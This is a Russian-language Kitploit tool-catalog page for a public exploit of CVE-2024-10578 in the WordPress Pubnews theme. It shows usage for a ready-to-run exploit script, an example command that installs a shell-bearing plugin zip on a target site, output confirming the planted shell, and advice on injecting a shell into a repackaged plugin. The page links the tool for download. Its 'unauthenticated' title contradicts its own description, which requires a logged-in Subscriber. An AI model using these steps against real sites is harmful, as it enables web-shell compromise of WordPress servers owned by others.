Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-10578 — Pubnews <= 1.0.7 - Неаутентифицированная произвольная установка плагинов | Kitploit
Инструменты/GitHubGitHub/nxploited/cve-2024-10578
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеРазработка Полезной Нагрузки
GitHubnxploited/cve-2024-10578

CVE-2024-10578

Pubnews <= 1.0.7 - Неаутентифицированная произвольная установка плагинов

Репозиторий
11 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-10578: Pubnews <= 1.0.7 - Неавторизованная установка произвольного плагина

Описание

Тема Pubnews для WordPress уязвима к неавторизованной установке произвольных плагинов из-за отсутствия проверки прав доступа в функции pubnews_importer_plugin_action_for_notice() во всех версиях до 1.0.7 включительно. Эта уязвимость позволяет аутентифицированным атакующим с уровнем доступа Subscriber и выше устанавливать произвольные плагины, которые могут быть использованы для эксплуатации других уязвимостей.

CWE

  • CWE-434: Неограниченная загрузка файла с опасным типом

CVSS

  • Оценка: 8.8 (ВЫСОКАЯ)
  • Версия: 3.1
  • Вектор: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Эксплойт-скрипт: wordpress_exploit.py

Этот скрипт эксплуатирует уязвимость в теме Pubnews для установки произвольного плагина из предоставленного URL-адреса. Плагин может содержать вредоносную оболочку или любую другую нагрузку.

Использование

root@kitploit:~

CVE-2024-10578.py [-h] -u URL -un USERNAME -p PASSWORD -url_zip PLUGIN_URL

Pubnews <= 1.0.7 - Unauthenticated Arbitrary Plugin Installation # By Nxploited, Khaled alenazi

options:
  -h, --help            show this help message and exit
  -u, --url URL         The URL of the WordPress site
  -un, --username USERNAME
                        The username for WordPress login
  -p, --password PASSWORD
                        The password for WordPress login
  -url_zip, --plugin_url PLUGIN_URL
                        The plugin URL to install (must be a zip file with the shell injected inside)

Пример

root@kitploit:~
python 
CVE-2024-10578.py -u http://target/wordpress -un admin -p admin -url_zip http://target/shell1.zip

Вывод

root@kitploit:~
[+] Logged in successfully.
[+] Admin _wpnonce extracted: 6bf22371ab
[+] Plugin installed successfully.
[+] Plugin extracted. You can find the shell here: /wp-content/plugins/shell1/

Важные замечания

  • URL-адрес плагина должен быть прямой ссылкой на zip-файл, содержащий оболочку или любую другую нагрузку.
  • Рекомендуется использовать любой существующий плагин WordPress, внедрить в него оболочку, а затем снова упаковать в zip. Загрузите этот zip-файл по прямой ссылке для эксплуатации.

⚠️ Отказ от ответственности

Этот скрипт предназначен только для образовательных целей. Автор не одобряет использование этого скрипта для незаконных действий. Используйте его ответственно и только на системах, на тестирование которых у вас есть явное разрешение.

Автор: Nxploited | Khaled Alenazi

Скачать инструмент